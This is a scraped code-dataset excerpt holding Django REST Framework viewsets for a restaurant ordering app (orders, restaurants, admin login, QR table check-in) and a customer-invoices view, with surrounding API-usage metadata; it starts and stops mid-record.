311, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 321, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 336, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 337, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 354, "usage_type": "call"}, {"api_name": "numpy.dstack", "line_number": 359, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 360, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 369, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 372, "usage_type": "call"}, {"api_name": "cv2.fillPoly", "line_number": 375, "usage_type": "call"}, {"api_name": "numpy.int_", "line_number": 375, "usage_type": "call"}, {"api_name": "cv2.fillPoly", "line_number": 376, "usage_type": "call"}, {"api_name": "numpy.int_", "line_number": 376, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 377, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 378, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 378, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 379, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 379, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 380, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 380, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 381, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 381, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 382, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 382, "usage_type": "name"}, {"api_name": "numpy.dstack", "line_number": 385, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 386, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 393, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 393, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 393, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 395, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 398, "usage_type": "call"}, {"api_name": "cv2.fillPoly", "line_number": 401, "usage_type": "call"}, {"api_name": "numpy.int_", "line_number": 401, "usage_type": "call"}, {"api_name": "cv2.fillPoly", "line_number": 402, "usage_type": "call"}, {"api_name": "numpy.int_", "line_number": 402, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 403, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 408, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 416, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 422, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 424, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 425, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 425, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 436, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 442, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 464, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 465, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 477, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 477, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 478, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 479, "usage_type": "call"}, {"api_name": "cv2.merge", "line_number": 479, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 479, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 480, "usage_type": "call"}, {"api_name": "cv2.merge", "line_number": 480, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 481, "usage_type": "attribute"}, {"api_name": "cv2.addWeighted", "line_number": 482, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 486, "usage_type": "call"}, {"api_name": "cv2.merge", "line_number": 486, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 486, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 493, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 504, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 505, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 507, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 509, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 516, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 516, "usage_type": "attribute"}, {"api_name": "numpy.dstack", "line_number": 517, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 520, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 520, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 520, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 521, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 521, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 521, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 521, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 522, "usage_type": "call"}, {"api_name": "cv2.fillPoly", "line_number": 525, "usage_type": "call"}, {"api_name": "numpy.int_", "line_number": 525, "usage_type": "call"}, {"api_name": "cv2.warpPerspective", "line_number": 528, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 530, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 531, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 531, "usage_type": "name"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 534, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 538, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 538, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 539, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 540, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 541, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 542, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 544, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 544, "usage_type": "attribute"}]} +{"seq_id": "509688631", "text": "from rest_framework import filters, mixins, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.permissions import IsAdminUser\nfrom sreps.api.v1.serializers.customer import CustomerSerializer\nfrom sreps.api.v1.serializers.invoice import InvoiceListSerializer\nfrom sreps.core.models import Customer, Invoice\n\n\nclass CustomerViewSet(\n mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n viewsets.GenericViewSet,):\n\n queryset = Customer.objects.all()\n serializer_class = CustomerSerializer\n permission_classes = (IsAdminUser,)\n\n @action(detail=True, methods=['GET'], name='Customer invoices')\n def invoices(self, request, pk=None):\n \"\"\"Get invoices made by a customer.\"\"\"\n\n customer = get_object_or_404(self.queryset, pk=pk)\n\n invoices = Invoice.objects.filter(\n customer=customer).order_by('-datetime_created')\n serializer = InvoiceListSerializer(invoices, many=True)\n\n return Response(serializer.data)\n", "sub_path": "sreps/api/v1/views/customer.py", "file_name": "customer.py", "file_ext": "py", "file_size_in_byte": 1105, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 10, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 10, "usage_type": "name"}, {"api_name": "rest_framework.mixins.RetrieveModelMixin", "line_number": 11, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 11, "usage_type": "name"}, {"api_name": "rest_framework.mixins.CreateModelMixin", "line_number": 12, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 12, "usage_type": "name"}, {"api_name": "rest_framework.mixins.UpdateModelMixin", "line_number": 13, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 13, "usage_type": "name"}, {"api_name": "rest_framework.mixins.DestroyModelMixin", "line_number": 14, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 14, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 15, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 15, "usage_type": "name"}, {"api_name": "sreps.core.models.Customer.objects.all", "line_number": 17, "usage_type": "call"}, {"api_name": "sreps.core.models.Customer.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sreps.core.models.Customer", "line_number": 17, "usage_type": "name"}, {"api_name": "sreps.api.v1.serializers.customer.CustomerSerializer", "line_number": 18, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAdminUser", "line_number": 19, "usage_type": "name"}, {"api_name": "sreps.core.models.Invoice.objects.filter", "line_number": 27, "usage_type": "call"}, {"api_name": "sreps.core.models.Invoice.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "sreps.core.models.Invoice", "line_number": 27, "usage_type": "name"}, {"api_name": "sreps.api.v1.serializers.invoice.InvoiceListSerializer", "line_number": 29, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "89568133", "text": "from django.contrib.auth.hashers import check_password\nfrom rest_framework import viewsets, status, mixins\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom rest_framework.utils import json\nfrom django.forms.models import model_to_dict\nfrom django.db.models import ObjectDoesNotExist\nimport logging\nfrom ServeUp.Views.helper import *\n\nclass NarociloViewSet(viewsets.ModelViewSet):\n \"\"\"\n ViewSet provides 'list', 'create', 'retrieve', 'update' and 'destroy' actions\n\n Additional actions can be added using '@action()' decorator, default response\n is GET, you can add POST using 'methods' argument\n \"\"\"\n queryset = Narocilo.objects.all()\n serializer_class = NarociloSerializer\n\n def list(self, request, *args, **kwargs):\n \"\"\"\n Returns all orders for restaurant with specified id in GET parameter 'id_restavracija'.\n\n ORDER_NEW = 0 # \"Nova Naročila\"\n ORDER_PREPARING = 1 # \"V Pripravi\"\n ORDER_DONE = 2 # \"Pripravljeno\"\n ORDER_FINISHED = 3 # \"Končano\"\n \"\"\"\n get_params = request.query_params\n response = {}\n return_data = {}\n\n try:\n id_restavracija = get_params['id_restavracija']\n except KeyError:\n response['status'] = 0\n response['description'] = \"Missing id, add ?id_restavracija=x to call\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n data = JediNarocilaPodatki.objects.filter(id_restavracija=id_restavracija,\n status__in=[ORDER_NEW, ORDER_DONE, ORDER_PREPARING, ORDER_FINISHED])\n data = JediNarocilaPodatkiSerializer(data, many=True).data\n\n for order in data:\n id_narocila = order['id_narocila']\n if id_narocila not in return_data:\n return_data[id_narocila] = {\n 'cas_prevzema': order['cas_prevzema'],\n 'cas_narocila': order['cas_narocila'],\n 'id_restavracija': order['id_restavracija'],\n 'id_uporabnik': order['id_uporabnik'],\n 'cena': 0,\n 'id_narocila': order['id_narocila'],\n 'status': order['status'],\n 'checked_in': order['checked_in'],\n 'id_miza': order['id_miza'],\n 'jedi': []\n }\n\n return_data[id_narocila]['jedi'].append({\n 'id_jed': order['id_jed'],\n 'ime_jedi': order['ime_jedi'],\n 'kolicina': order['kolicina'],\n 'cena': order['cena']\n })\n return_data[id_narocila]['cena'] += order['cena']\n\n response['status'] = 1\n response['data'] = list(return_data.values())\n return Response(response, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['GET'])\n def refresh(self, request):\n \"\"\"\n Returns new and cancelled orders for a restaurant\n GET params:\n id_restavracija: id of the restaurant to refresh orders\n \"\"\"\n get_params = request.query_params\n response = {}\n\n try:\n id_restavracija = get_params['id_restavracija']\n except KeyError:\n response['status'] = 0\n response['description'] = \"Missing id, add ?id_restavracija=x to call\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n new, cancelled, checked_in = get_new_cancelled_checked_in_orders(int(id_restavracija))\n response['status'] = 1\n response['new_orders'] = new\n response['cancelled_orders'] = cancelled\n response['checked_in_orders'] = checked_in\n return Response(response, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['POST'])\n def cancel_order(self, request):\n \"\"\"\n Receive order id and delete that order from the database effectively cancelling it.\n Add the order id to the cancelled orders list\n Return conformation of action or error.\n \"\"\"\n response = {}\n data = json.load(request)\n try:\n order_id = data['id_narocilo']\n except KeyError as e:\n response['status'] = 0\n response['description'] = \"Missing key data \" + str(e) + \"\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n # noinspection PyBroadException\n try:\n narocilo = Narocilo.objects.get(id_narocila=order_id)\n order = {'id_narocila': narocilo.id_narocila, 'id_restavracija': narocilo.id_restavracija.id_restavracija}\n narocilo.delete()\n add_cancelled_order(order)\n response['status'] = 1\n response['description'] = \"Successfully deleted order\"\n return Response(response, status=status.HTTP_200_OK)\n except Exception:\n response['status'] = 0\n response['description'] = \"Could not delete order {}\".format(order_id)\n return Response(response, status=status.HTTP_503_SERVICE_UNAVAILABLE)\n\n @action(detail=False, methods=['POST'])\n def new_order(self, request):\n \"\"\"\n The function receives JSON data with the details of a new order and stores it.\n Return values\n status: 0 - Error, 1 - Successfully added\n description: Short description of Error or confirm desired action\n \"\"\"\n response = {}\n data = json.load(request)\n\n try:\n order = {\n \"cas_prevzema\": data['cas_prevzema'],\n \"cas_narocila\": data['cas_narocila'],\n \"id_restavracija\": data['id_restavracija'],\n \"id_uporabnik\": data['id_uporabnik'],\n \"status\": ORDER_NEW,\n \"checked_in\": False\n }\n meals = data['jedi']\n except KeyError as e:\n response['status'] = 0\n response['description'] = \"Missing key data \" + str(e) + \"\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n if len(meals) == 0: # If there are no meals in order wrong formatting\n response['status'] = 0\n response['description'] = \"No meal data\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n serializer = NarociloSerializer(data=order)\n if serializer.is_valid():\n narocilo = serializer.save()\n id_narocila = narocilo.id_narocila\n\n success, price = add_meals_to_order(meals, id_narocila)\n if not success: # Something went wrong delete order\n narocilo.delete()\n response['status'] = 0\n response['description'] = \"Could not insert meals\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n order['cena'] = price\n order['id_narocila'] = id_narocila\n order['jedi'] = meals\n add_new_order(order)\n response['status'] = 1\n response['description'] = \"New order created\"\n return Response(response, status=status.HTTP_201_CREATED)\n else:\n response['status'] = 0\n response['description'] = \"Could not add new order\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n @action(detail=False, methods=['POST'])\n def status_update(self, request):\n response = {'status': \"\",\n 'description': \"\"}\n order = Narocilo.objects.get(id_narocila=request.data['id_narocilo'])\n data = model_to_dict(order)\n data[\"status\"] = request.data[\"status\"]\n\n if not 0 <= request.data[\"status\"] <= 3:\n response['status'] = 0\n response['description'] = \"Invalid status value\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n serializer = NarociloSerializer(data=data, instance=order)\n if serializer.is_valid():\n serializer.save()\n response['status'] = 1\n response['description'] = \"Successfully changed status\"\n return Response(response, status=status.HTTP_200_OK)\n else:\n response['status'] = 0\n response['description'] = serializer.errors\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass RestavracijaViewSet(viewsets.ModelViewSet):\n \"\"\"\n ViewSet provides 'list', 'create', 'retrieve', 'update' and 'destroy' actions\n\n Additional actions can be added using '@action()' decorator, default response\n is GET, you can add POST using 'methods' argument\n \"\"\"\n queryset = Restavracija.objects.all()\n serializer_class = RestavracijaSerializer\n\n @action(detail=False, methods=['POST'])\n def home(self, request):\n \"\"\"\n The function receives JSON data with the name of a city.\n Return all restaurants in given city.\n Return values\n status: 0 - Error\n description: Short description of Error or confirm desired action\n\n If valid input return only array of restaurants, request by Urban.\n \"\"\"\n response = {}\n try:\n location = request.data['location']\n except KeyError:\n location = None\n\n if location is None:\n response['status'] = 0\n response['description'] = \"Error: Please input the location\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n else:\n response = get_restaurants(location)\n return Response(response, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['POST'])\n def register(self, request):\n \"\"\"\n The function receives a JSON data with the admin email, restaurant name,\n restaurant type, address and rating\n Return values\n status: 0 - Error, 1 - OK\n description: Short description of Error or confirm desired action\n additional actions: Set of actions that also had to be performed, in ex. updating address table\n \"\"\"\n response = {'status': \"\",\n 'description': \"\",\n 'additional actions': \"\"}\n\n # Get admin id\n id_admin = AdminUporabnik.objects.get(email=request.data['email']).id\n\n # Deal with address id\n requested_data = request.data['naslov'].split(', ')\n address = requested_data[0].split(' ')\n post = requested_data[1].split(' ')\n\n try:\n id_address = Naslov.objects.get(ulica=\" \".join(address[:-1]), hisna_stevilka=address[-1]).id_naslov\n except Naslov.DoesNotExist:\n naslov_data = {'ulica': \" \".join(address[:-1]),\n 'hisna_stevilka': address[-1],\n 'postna_stevilka': post[0]}\n\n # Add post to Posta table, if it doesn't exist\n try:\n Posta.objects.get(postna_stevilka=post[0])\n except Posta.DoesNotExist:\n posta_data = {'postna_stevilka': post[0], 'kraj': post[1]}\n serializer_posta = PostaSerializer(data=posta_data)\n if serializer_posta.is_valid():\n serializer_posta.save()\n response['additional actions'] += \"\\nUpdated Posta table\"\n else:\n response['status'] = 0\n response['description'] = serializer_posta.errors\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n # Add address to Naslov table, if it doesn't exist\n serializer_naslov = NaslovSerializer(data=naslov_data)\n if serializer_naslov.is_valid():\n serializer_naslov.save()\n response['additional actions'] += \"\\nUpdated Address table\"\n else:\n response['status'] = 0\n response['description'] = serializer_naslov.errors\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n id_address = Naslov.objects.get(ulica=\" \".join(address[:-1]), hisna_stevilka=address[-1]).id_naslov\n\n # Build JSON object\n data = {'id_admin': id_admin,\n 'ime_restavracije': request.data['ime_restavracije'],\n 'id_tip_restavracije': request.data['id_tip_restavracije'],\n 'id_naslov': id_address, 'ocena': request.data['ocena']}\n\n serializer = RestavracijaSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n response['status'] = 1\n response['description'] = \"Restaurant added to admin\"\n return Response(response, status=status.HTTP_201_CREATED)\n else:\n response['status'] = 0\n response['description'] = serializer.errors\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n @action(detail=False, methods=['GET'])\n def fetch_qr(self, request):\n \"\"\"\n Function receives id_restavracija parameter\n Returns all QR codes for a given id_restavracija\n Return values:\n status: 0 || 1\n data: JSON array with QR codes\n \"\"\"\n\n get_params = request.query_params\n response = {}\n return_data = []\n\n try:\n id_restavracija = get_params['id_restavracija']\n except KeyError:\n response['status'] = 0\n response['description'] = \"Missing id, add ?id_restavracija=x to call\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n data = Mize.objects.filter(id_restavracija=id_restavracija)\n data = MizeSerializer(data, many=True).data\n\n for obj in data:\n id_miza = obj['id_miza']\n if id_miza not in return_data:\n return_data.append(id_miza)\n\n response['status'] = 1\n response['data'] = return_data\n return Response(response, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['POST'])\n def add_table(self, request):\n response = {}\n data = request.data\n\n try:\n id_restavracija = data['id_restavracija']\n qr = data['qr']\n except KeyError as e:\n response['status'] = 0\n response['description'] = \"Missing key data \" + str(e) + \"\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n if not len(qr):\n response['status'] = 0\n response['description'] = \"Missing data\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n table = {\n 'id_restavracija': id_restavracija,\n 'id_miza': qr\n }\n\n serializer = MizeSerializer(data=table)\n if serializer.is_valid():\n serializer.save()\n response['status'] = 1\n response['description'] = \"Successfully added table to restaurant\"\n return Response(response, status=status.HTTP_200_OK)\n else:\n response['status'] = 0\n response['description'] = serializer.errors\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass TipRestavracijeViewSet(viewsets.ModelViewSet):\n \"\"\"\n ViewSet provides 'list', 'create', 'retrieve', 'update' and 'destroy' actions\n\n Additional actions can be added using '@action()' decorator, default response\n is GET, you can add POST using 'methods' argument\n \"\"\"\n serializer_class = TipRestavracijeSerializer\n queryset = TipRestavracije.objects.all()\n model = TipRestavracije\n\n\nclass AdminUporabnikViewSet(mixins.ListModelMixin, viewsets.GenericViewSet):\n serializer_class = AdminUporabnikSerializer\n queryset = AdminUporabnik.objects.all()\n model = AdminUporabnik\n\n @action(detail=False, methods=['POST'])\n def login(self, request):\n \"\"\"\n The function receives JSON data with the email and the password. If the user exist and the password is\n correct we return the id of the restaurant the user manages, if he does not manage any restaurant returns None.\n Return values\n status: 0 - Error, 1 - OK\n description: Short description of Error or confirm desired action\n id_restavracija: If status 1, id of restaurant or None\n \"\"\"\n response = {}\n\n # First try to get the user\n try:\n user = AdminUporabnik.objects.get(email=request.data['email'])\n except AdminUporabnik.DoesNotExist:\n user = None\n\n # if user exist check password\n if user is not None:\n password = request.data['password']\n match = check_password(password, user.password)\n if not match:\n response['status'] = 0\n response['description'] = \"Password does not match\"\n return Response(response, status=status.HTTP_401_UNAUTHORIZED)\n else:\n query = Restavracija.objects.all().filter(id_admin=user.id)\n data = RestavracijaSerializer(query, many=True).data\n\n if len(data) != 0:\n id_restavracija = data[0]['id_restavracija']\n else:\n id_restavracija = None\n\n response['status'] = 1\n response['description'] = \"Username and password match\"\n response['id_restavracija'] = id_restavracija\n return Response(response, status=status.HTTP_200_OK)\n else:\n response['status'] = 0\n response['description'] = \"Username does not exist\"\n return Response(response, status=status.HTTP_401_UNAUTHORIZED)\n\n @action(detail=False, methods=['POST'])\n def register(self, request):\n \"\"\"\n The function receives JSON data with the email and the password.\n If the input data is valid it creates a new admin user.\n Return values\n status: 0 - Error, 1 - OK\n description: Short description of Error or confirm desired action\n \"\"\"\n serializer = AdminUporabnikSerializer(data=request.data)\n response = {}\n if serializer.is_valid():\n serializer.save()\n response['status'] = 1\n response['description'] = \"New user created\"\n return Response(response, status=status.HTTP_201_CREATED)\n else:\n email_error = (\"Email - \" + serializer.errors['email'][0]) if 'email' in serializer.errors else \"\"\n password_error = (\n \"Password - \" + serializer.errors['password'][0]) if 'password' in serializer.errors else \"\"\n\n response['status'] = 0\n response['description'] = \"Error: \" + email_error + password_error\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UporabnikViewSet(mixins.ListModelMixin, viewsets.GenericViewSet):\n serializer_class = UporabnikSerializer\n queryset = Uporabnik.objects.all()\n model = Uporabnik\n\n @action(detail=False, methods=['POST'])\n def get_orders(self, request):\n \"\"\"\n Return all orders and meal data for given user\n \"\"\"\n response = {}\n try:\n id_uporabnik = request.data['id_uporabnik']\n except KeyError:\n id_uporabnik = None\n\n try:\n limit = int(request.data['num_orders'])\n except KeyError:\n limit = 10\n\n if id_uporabnik is None:\n response['status'] = 0\n response['description'] = \"Error: Please input the user id\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n else:\n response['status'] = 1\n response['description'] = \"Orders for user: \" + id_uporabnik + \"\"\n response['orders'] = get_orders(id_uporabnik, limit)\n return Response(response, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['POST'])\n def register(self, request):\n \"\"\"\n The function receives JSON data with the token of the new user.\n If the input data is valid it creates a new user.\n Return values\n status: 0 - Error, 1 - New user created, 2 - User already registered\n description: Short description of Error or confirm desired action\n \"\"\"\n try:\n user = Uporabnik.objects.get(id_uporabnik=request.data['id_uporabnik'])\n except Uporabnik.DoesNotExist:\n user = None\n\n response = {}\n if user is None:\n serializer = UporabnikSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n response['status'] = 1\n response['description'] = \"New user created\"\n return Response(response, status=status.HTTP_201_CREATED)\n else:\n id_error = \"ID: \" + serializer.errors['id_uporabnik'][0]\n response['status'] = 0\n response['description'] = \"Error: \" + id_error\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n else:\n response['status'] = 2\n response['description'] = \"User already registered\"\n return Response(response, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['POST'])\n def check_in(self, request):\n # TODO: Implement check in from user\n response = {}\n try:\n id_narocila = request.data['id_narocilo']\n qr = request.data['qr']\n except KeyError:\n response['status'] = 0\n response['description'] = \"Error: Missing either id_narocilo or qr\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n # noinspection PyBroadException\n try:\n order = Narocilo.objects.get(id_narocila=id_narocila)\n order_id_restaurant = order.id_restavracija\n except Exception:\n response['status'] = 0\n response['description'] = \"Could not retrieve order {}\".format(id_narocila)\n return Response(response, status=status.HTTP_503_SERVICE_UNAVAILABLE)\n\n try:\n Mize.objects.get(id_restavracija=order_id_restaurant, id_miza=qr)\n except models.ObjectDoesNotExist:\n response['status'] = 0\n response['description'] = \"Error: Restaurant ID and QR do not match for provided Order\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n data = model_to_dict(order)\n data[\"checked_in\"] = True\n data[\"id_miza\"] = qr\n\n serializer = NarociloSerializer(data=data, instance=order)\n if serializer.is_valid():\n serializer.save()\n # Add order to checked_in array to be used in refresh api call\n order_dict = {'id_narocila': order.id_narocila, 'qr': qr,\n 'id_restavracija': order.id_restavracija.id_restavracija}\n add_checked_in_order(order_dict)\n\n response['status'] = 1\n response['description'] = \"Successfully checked in order\"\n return Response(response, status=status.HTTP_200_OK)\n else:\n response['status'] = 0\n response['description'] = serializer.errors\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass JedViewSet(mixins.ListModelMixin, viewsets.GenericViewSet):\n serializer_class = JedSerializer\n queryset = Jed.objects.all()\n model = Jed\n\n def list(self, request, *args, **kwargs):\n return_data = defaultdict(list)\n get_params = request.query_params\n\n try:\n id_restavracija = get_params['id_restavracija']\n except KeyError:\n response = {\n 'status': 0,\n 'description': \"Missing id, add ?id_restavracija=x to call\"\n }\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n meal_types = JedilniList.objects.all()\n meal_types = JedilniListSerializer(meal_types, many=True).data\n meal_types = {x['id_jedilni_list']: x['vrsta'] for x in meal_types} # Transform OrderDict to dict\n\n meals = Jed.objects.filter(id_restavracija=id_restavracija)\n meals = JedSerializer(meals, many=True).data\n\n for meal in meals:\n typ = meal_types[meal['id_jedilni_list']]\n return_data[typ].append({\n 'id_jed': meal['id_jed'],\n 'ime_jedi': meal['ime_jedi'],\n 'opis_jedi': meal['opis_jedi'],\n 'cena': meal['cena'],\n 'kolicina': 1\n })\n\n return Response(return_data, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['POST'])\n def new_meal(self, request):\n \"\"\"\n Create new meal\n \"\"\"\n serializer = JedSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n response = {'status': 1, 'description': \"New meal created\"}\n return Response(response, status=status.HTTP_201_CREATED)\n else:\n response = {'status': 0, 'description': \"Could not create meal\"}\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n", "sub_path": "ServeUp/Views/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 25251, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 11, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 11, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 39, "usage_type": "call"}, {"api_name": 